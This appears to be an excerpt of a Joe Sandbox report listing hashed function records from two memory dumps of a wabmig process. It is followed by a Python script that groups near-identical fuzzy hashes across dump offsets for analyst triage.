                                                              • Instruction ID: e3dda2814df78a07de650f975462782a992a69445f76eda0cceb10148aa220b0
                                                              • Opcode Fuzzy Hash: 60b57e93cd0777e5cef9840c607ba685eba5ae31251c4e9ac95ef8c496428f33
                                                              • Instruction Fuzzy Hash: BEC0123350C0642D9735005D3C81DFB5B5DC3C53B5A2501B7F95CD32019C464C8541A4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38f3573cfa05fbfa73574a00d2d9f5d6365c82d58815d2d532a502e049542811
                                                              • Instruction ID: f1a8b62c80f33c451c422f03bcd280d7b7870af5d319824306d62f4faac77846
                                                              • Opcode Fuzzy Hash: 38f3573cfa05fbfa73574a00d2d9f5d6365c82d58815d2d532a502e049542811
                                                              • Instruction Fuzzy Hash: 9CD0673AB400089FCB049F99E8449DDF776FB98221B048516E915A3264C6319925DB60
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d551081f5151bafe91c69a3cfcf96ebf4f5dc8702d39ec81d2006087b4c6a363
                                                              • Instruction ID: 4896cf1ba6e7f12a6753a7e0cda6967b1804f026f15719f1cc79756fd9b04895
                                                              • Opcode Fuzzy Hash: d551081f5151bafe91c69a3cfcf96ebf4f5dc8702d39ec81d2006087b4c6a363
                                                              • Instruction Fuzzy Hash: 3FD012396443144FD741FB64D84855A3B57BAD4101710D610A4150568FDF7959464B51
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dbc9c47b9fcec74ff4e38ba053d77161b91bba40067041967027a71419e4580f
                                                              • Instruction ID: 440f65f86559663f8be823bdeceddc1ddcab8f5dcab391a2229bb3f6f2945fb4
                                                              • Opcode Fuzzy Hash: dbc9c47b9fcec74ff4e38ba053d77161b91bba40067041967027a71419e4580f
                                                              • Instruction Fuzzy Hash: B2C080351443184FD741FB75DC495173B1FFAD0501740C610A4050664FDF7C2D454B95
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3eac4dc5d3372feb7aa4bd88daca1fcd24576ac19e52f55c2ed56b1de0944cdd
                                                              • Instruction ID: 34d0d6ab300077a61ada2eeb8062a09fe585ae452714cafbb5ea5acadbeb91ab
                                                              • Opcode Fuzzy Hash: 3eac4dc5d3372feb7aa4bd88daca1fcd24576ac19e52f55c2ed56b1de0944cdd
                                                              • Instruction Fuzzy Hash: F252AC75E01228CFDB64DF65C884BADBBB2BB89301F5081E9D409AB355DB35AE81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9fb4ead81fe87f34b30d55ef851e0b118023e4750451ca8e8cf9084de01ca0ad
                                                              • Instruction ID: 8748f5c999354d126cdf1a626fbf8ec8750d7162d7697be3d57f551ffa64fad1
                                                              • Opcode Fuzzy Hash: 9fb4ead81fe87f34b30d55ef851e0b118023e4750451ca8e8cf9084de01ca0ad
                                                              • Instruction Fuzzy Hash: 7AC1BF75E00218CFDB14DFA9C994BADBBB2BF89300F2481A9D409AB355DB359E85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_940000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21efad4f654d4807d30560fcf7618def13a3b9f9987abf76d982229f4e8f6502
                                                              • Instruction ID: 40ad7ff8521bc4d9ff7bbfa1ab11fc87c805a89ec52835d3fc58c8ec3d76f5ef
                                                              • Opcode Fuzzy Hash: 21efad4f654d4807d30560fcf7618def13a3b9f9987abf76d982229f4e8f6502
                                                              • Instruction Fuzzy Hash: 1CC1B075E00218CFDB14DFA5C994B9DBBB2BB89300F2081A9D409AB365DB359E85DF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 917fa06cbdf6e7173d32e9bf90e3b7bca9ac5e664f0ba89c55226ba34fc4f37e
                                                              • Instruction ID: 48e5caf53c05a8e5e42f4f82c1b78b3dacc70da3fce0ae3e827f1aae754079ef
                                                              • Opcode Fuzzy Hash: 917fa06cbdf6e7173d32e9bf90e3b7bca9ac5e664f0ba89c55226ba34fc4f37e
                                                              • Instruction Fuzzy Hash: 69C19F75E00218CFDB14EFA5C954B9DBBB2BF89300F2481A9D809AB355DB35AE85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b7847db507cbfce0ba7d4891129320f869acb2ff0cbabeac168bafb41e21798
                                                              • Instruction ID: 42e874a9e436cb9f65123e4daff8171157e733a180d62a6d16f5a3855812d2d8
                                                              • Opcode Fuzzy Hash: 5b7847db507cbfce0ba7d4891129320f869acb2ff0cbabeac168bafb41e21798
                                                              • Instruction Fuzzy Hash: 2EC19F75E00218CFEB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB35AE85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04919810331b7257f4ea7c91d0d43e63e7148c0ebc69b5560ca8267b87a09a44
                                                              • Instruction ID: dfb970f08e706803957df1e89a1e4c4675b0611e49268430de762f1f8e69c4fd
                                                              • Opcode Fuzzy Hash: 04919810331b7257f4ea7c91d0d43e63e7148c0ebc69b5560ca8267b87a09a44
                                                              • Instruction Fuzzy Hash: D2C18075E00218CFDB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB35AE85DF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25c5421fb7e435c71a234de85e9260322ef4d898205abe8d0ddc7537af3e9a6b
                                                              • Instruction ID: 73ce3010e45cd358d2cc622d62d3e5e9d239da1dc9061fb8cc9c9caa0dd860d7
                                                              • Opcode Fuzzy Hash: 25c5421fb7e435c71a234de85e9260322ef4d898205abe8d0ddc7537af3e9a6b
                                                              • Instruction Fuzzy Hash: E9C19F75E00218CFDB14DFA5C954BADBBB2BB89300F2081A9D809AB365DB359E85DF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f34ac3b42930f3c39e2459476753e950675742a8365fd6aae8e21eb646acd3c2
                                                              • Instruction ID: 54f3bf3bff52697f2937a43d3c8c324c110049f0debaa237a36b19114a049bbd
                                                              • Opcode Fuzzy Hash: f34ac3b42930f3c39e2459476753e950675742a8365fd6aae8e21eb646acd3c2
                                                              • Instruction Fuzzy Hash: 15C18F75E00218CFDB14DFA5C994B9DBBB2FB89300F2081A9D809AB365DB359E85DF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63966fc9e341df004bc386ef9b35ed8f2c7399cfef649f7d7e758bc4e775cc6f
                                                              • Instruction ID: ab68e9aded7e6ee43e8299a6748d8ad5249ec833cf17dd36203ccc61f5ad499c
                                                              • Opcode Fuzzy Hash: 63966fc9e341df004bc386ef9b35ed8f2c7399cfef649f7d7e758bc4e775cc6f
                                                              • Instruction Fuzzy Hash: 09C18F75E00218CFDB14DFA5C994B9DBBB2BF89300F2081A9D409AB365DB359E85DF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9c4d7f08fd24929b1a7617902c9b74ef789e1564060906cc2e27e98adc857695
                                                              • Instruction ID: 82bbcdb5fb5f34e9f02c87b04ac90c274c10dc08b15e5133b12d2d105c2b9c6d
                                                              • Opcode Fuzzy Hash: 9c4d7f08fd24929b1a7617902c9b74ef789e1564060906cc2e27e98adc857695
                                                              • Instruction Fuzzy Hash: 9FC19F75E00218CFDB14DFA5C994B9DBBB2FB89300F2481A9D409AB365DB35AE85CF50
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1137898e0b807fd4ba66958e6c774cb87c320a4101fa79434365b6076ea4d6c8
                                                              • Instruction ID: a7e26344b0af17746359d8dcb4ac226a85496f95c4ed622753e110d8316e6500
                                                              • Opcode Fuzzy Hash: 1137898e0b807fd4ba66958e6c774cb87c320a4101fa79434365b6076ea4d6c8
                                                              • Instruction Fuzzy Hash: E8C19E75E00218CFDB14DFA5C944B9DBBB2FB89300F2081A9D809AB365DB35AE85CF51
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 554616f3bd4251452860467e0a6f3defe8c804c6def159d77d7a4674d484385e
                                                              • Instruction ID: 49c155e133e37262bc78eb3cf5e90a17782bb94090a23b0cc92c88f517732af6
                                                              • Opcode Fuzzy Hash: 554616f3bd4251452860467e0a6f3defe8c804c6def159d77d7a4674d484385e
                                                              • Instruction Fuzzy Hash: 43C19E75E00218CFEB14DFA5C994B9DBBB2FB89300F2081A9D409AB355DB35AE85CF51
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e0ed3678713e7ac4da22202222910421341ea3870451eeeb478aa72cd19a4344
                                                              • Instruction ID: a6caf7f44049d964fdfbb8bebefc82a296d796e5405c14b19e17875d262d241d
                                                              • Opcode Fuzzy Hash: e0ed3678713e7ac4da22202222910421341ea3870451eeeb478aa72cd19a4344
                                                              • Instruction Fuzzy Hash: F4C19E75E00218CFDB14DFA5C994B9DBBB2FB89300F2081A9D409AB355DB35AE85CF51
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_25d40000_wabmig.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8abb07287465eeaf4e93fd1dc79723fc718184160c2d2b9855144c61930480d
                                                              • Instruction ID: 0c4c0d858364a6ecb3bc90f29c881f6be47000e46f005914db1e44ebfd4cbe2e
                                                              • Opcode Fuzzy Hash: d8abb07287465eeaf4e93fd1dc79723fc718184160c2d2b9855144c61930480d
                                                              • Instruction Fuzzy Hash: 26C19E75E00218CFDB14DFA5C994B9DBBB2FB89300F2481A9D409AB355DB35AE85CF50
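Reading the records above by eye, the Instruction Fuzzy Hash values of several functions in the 00940000 dump (for example 7AC1BF75E00218CF...) differ from functions in the 25D40000 dump (D2C18075E00218CF...) in only a handful of hex digits, while unrelated functions in the same dump share almost nothing. The script below is an added example, not Joe Sandbox code: it parses the Memory Dump Source records as they appear in this report, scores pairs of hashes, and reports clusters of near-identical functions that occur at more than one dump offset, which is what an analyst would want to triage for the same code body living at two base addresses in process 7. The similarity measure (fraction of hex digits agreeing at the same position) is this example's assumption; the report does not document how the fuzzy hash is built, so the score is a triage hint rather than a verified match. SAMPLE_RECORDS is copied from five of the report's records, shortened to the fields the script uses.

```python
"""Group the 'Memory Dump Source' function records of a Joe Sandbox report by
near-identical Instruction Fuzzy Hash and flag groups spanning several offsets.

Added example, not Joe Sandbox code. SAMPLE_RECORDS is copied (shortened to
the fields used here) from this report's own listing. The similarity measure,
the fraction of hex digits that agree at the same position in two hash strings,
is this example's assumption: the report does not document the hash's
structure, so treat the score as a triage hint, not a verified code match.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Five records from this report: three from the 00940000 dump, two from 25D40000.
SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
• Instruction ID: 8748f5c999354d126cdf1a626fbf8ec8750d7162d7697be3d57f551ffa64fad1
• Instruction Fuzzy Hash: 7AC1BF75E00218CFDB14DFA9C994BADBBB2BF89300F2481A9D409AB355DB359E85CF50
Memory Dump Source
• Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
• Instruction ID: 40ad7ff8521bc4d9ff7bbfa1ab11fc87c805a89ec52835d3fc58c8ec3d76f5ef
• Instruction Fuzzy Hash: 1CC1B075E00218CFDB14DFA5C994B9DBBB2BB89300F2081A9D409AB365DB359E85DF50
Memory Dump Source
• Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
• Instruction ID: 48e5caf53c05a8e5e42f4f82c1b78b3dacc70da3fce0ae3e827f1aae754079ef
• Instruction Fuzzy Hash: 69C19F75E00218CFDB14EFA5C954B9DBBB2BF89300F2481A9D809AB355DB35AE85CF50
Memory Dump Source
• Source File: 00000007.00000002.2699849835.0000000025D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 25D40000, based on PE: false
• Instruction ID: dfb970f08e706803957df1e89a1e4c4675b0611e49268430de762f1f8e69c4fd
• Instruction Fuzzy Hash: D2C18075E00218CFDB14DFA5C994B9DBBB2BF89300F2081A9D409AB355DB35AE85DF50
Memory Dump Source
• Source File: 00000007.00000002.2679387230.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
• Instruction ID: a37a5c08495ec49050c98f8c4bdc0df1efcf8cb519f0395a282b4d6324e01059
• Instruction Fuzzy Hash: BCF02B319041549FCB018F28D8489EABFB1EF89321F0585A6E458C7191C3314D15CB51
"""

FIELD_RE = re.compile(r"^\s*•\s*([^:]+):\s*(.*?)\s*$", re.M)   # "• Key: value" lines
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")             # inside the Source File line


@dataclass(frozen=True)
class FunctionRecord:
    offset: str                 # base of the memory dump the function was lifted from
    source_file: str            # the .sdmp name
    instruction_id: str
    instruction_fuzzy_hash: str


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text on 'Memory Dump Source' headers and pull the bullet fields."""
    records: List[FunctionRecord] = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields = {k.strip(): v for k, v in FIELD_RE.findall(chunk)}
        src = fields.get("Source File", "")
        off = OFFSET_RE.search(src)
        records.append(FunctionRecord(
            offset=off.group(1).upper() if off else "",
            source_file=src.split(",")[0].strip(),
            instruction_id=fields.get("Instruction ID", ""),
            instruction_fuzzy_hash=fields.get("Instruction Fuzzy Hash", "").upper(),
        ))
    return records


def nibble_matches(h1: str, h2: str) -> int:
    """Positions at which two equal-length hex strings agree (0 if lengths differ)."""
    if not h1 or len(h1) != len(h2):
        return 0
    return sum(a == b for a, b in zip(h1, h2))


def cluster_by_hash(records: List[FunctionRecord], threshold: float = 0.85) -> List[List[FunctionRecord]]:
    """Single-linkage clusters: records join when their hash agreement >= threshold."""
    parent = list(range(len(records)))

    def find(i: int) -> int:
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            h1, h2 = records[i].instruction_fuzzy_hash, records[j].instruction_fuzzy_hash
            if h1 and len(h1) == len(h2) and nibble_matches(h1, h2) / len(h1) >= threshold:
                parent[find(i)] = find(j)
    groups: Dict[int, List[FunctionRecord]] = {}
    for i, rec in enumerate(records):
        groups.setdefault(find(i), []).append(rec)
    return sorted(groups.values(), key=len, reverse=True)


def cross_region_clusters(records: List[FunctionRecord], threshold: float = 0.85) -> List[List[FunctionRecord]]:
    """Clusters whose members were lifted from more than one dump offset."""
    return [g for g in cluster_by_hash(records, threshold) if len({r.offset for r in g}) > 1]


if __name__ == "__main__":
    for group in cross_region_clusters(parse_records(SAMPLE_RECORDS)):
        print(f"{len(group)} near-identical functions across offsets {sorted({r.offset for r in group})}:")
        for r in group:
            print(f"  {r.offset}  {r.instruction_fuzzy_hash}  ({r.instruction_id[:16]}...)")
```

Run against the full report text instead of SAMPLE_RECORDS and the same grouping shows which functions the two dumps have in common; the threshold is deliberately loose (0.85) because a few differing digits are expected when the same code sits at a different base address.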